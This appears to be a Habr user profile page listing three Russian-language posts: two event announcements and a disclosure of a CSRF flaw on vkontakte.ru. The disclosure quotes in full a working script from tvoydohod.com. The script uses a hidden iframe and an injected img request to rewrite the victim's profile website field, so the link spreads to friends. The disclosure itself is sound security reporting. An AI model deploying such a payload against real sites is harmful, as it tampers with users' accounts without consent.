Pull to refresh
61
0
Юра @kenshin

User

Send message

Мастер-класс Игоря Сысоева в Киеве

Reading time1 min
Views1.1K
Я подумал что кому-то это мероприятие может быть интересно. Не пиар и не агитация.

29 мая, в субботу, в Киеве состоится мастер-класс Игоря Сысоева. Сначала будет небольшое выступление, а потом ответы на вопросы всех пришедших.

А если кто-то таки решит пойти, то регистрация тут, а с кодом habrahabr скидка 10%.
Total votes 39: ↑29 and ↓10+19
Comments10

CSRF на vkontakte.ru

Reading time1 min
Views7.8K
Обнаружил забавную атаку на сайт vkontakte.ru.
При переходе на сайт tvoydohod.com, если вы в этот же момент авторизованы на вконтакте, отработает следующий джаваскрипт:
<script>
function doit() {
  var html;
  html = '<img src=http://vkontakte.ru/profileEdit.php?page=contacts&subm=1&website=http://tvoydohod.com>';
  window.frames["frm"].document.body.innerHTML = html;
}
</script>
<iframe name="frm" onload="doit()" width="0" height="0"></iframe>

Как видно, будет запрошена картинка с адресом vkontakte.ru/profileEdit.php?page=contacts&subm=1&website=http://tvoydohod.com, броузер сделает запрос по этому УРЛу, и на анкете в vkontakte ваше поле «Веб-сайт» станет равным tvoydohod.com.
Затем в вашем профайле, ваш друг, который вам доверяет кликнет на этот линк, и изменит профайл себе… И т д.

Этот вид атак называется Cross Site Request Forgery. В вики описаны все противоядия и куча полезной инфы.

Сам по себе CSRF довольно скучен. Но в данном случае забавно то, что каждый заразившийся становится разносчиком CSRF-линка.

Отписал в тех-поддержку, где столкнулся с «Это не баг!», «Не кликайте по подозрительным ссылкам!» и прочим. Надеюсь пользователей они ценят и поправят.
А вам было интересно узнать о таком простом «вирусе», который живет целиком в соц-сети =)
Total votes 143: ↑143 and ↓0+143
Comments134

Перенос конференции UA Web

Reading time1 min
Views689
Уважаемые колеги!

Мы приняли решение перенести первую конференцию украинских
веб-разработчиков UA Web с октября 2007 на март 2008 года.

Единственная причина — желание сделать свою работу хорошо.
Мало загореться идей, энтузиазм это здорово, но одного его
недостаточно. Нужна еще профессиональная работа и именно на
то, чтобы выполнить ее в полном объеме, времени не хватает.

Все достигнутые договоренности в силе; все деньги, уже
уплаченные за участие в конференции будут по желанию
плативших либо возвращены в полном объеме, либо перенесены
на март 2008 года.

Спасибо за поддержку!

С уважением,
команда UA Web
Юрий Артюх, Евгений Некоз, Павел Рогожин и Олег Бунин
uaweb.in.ua
Total votes 13: ↑7 and ↓6+1
Comments4

Information

Rating
Does not participate
Date of birth
Registered
Activity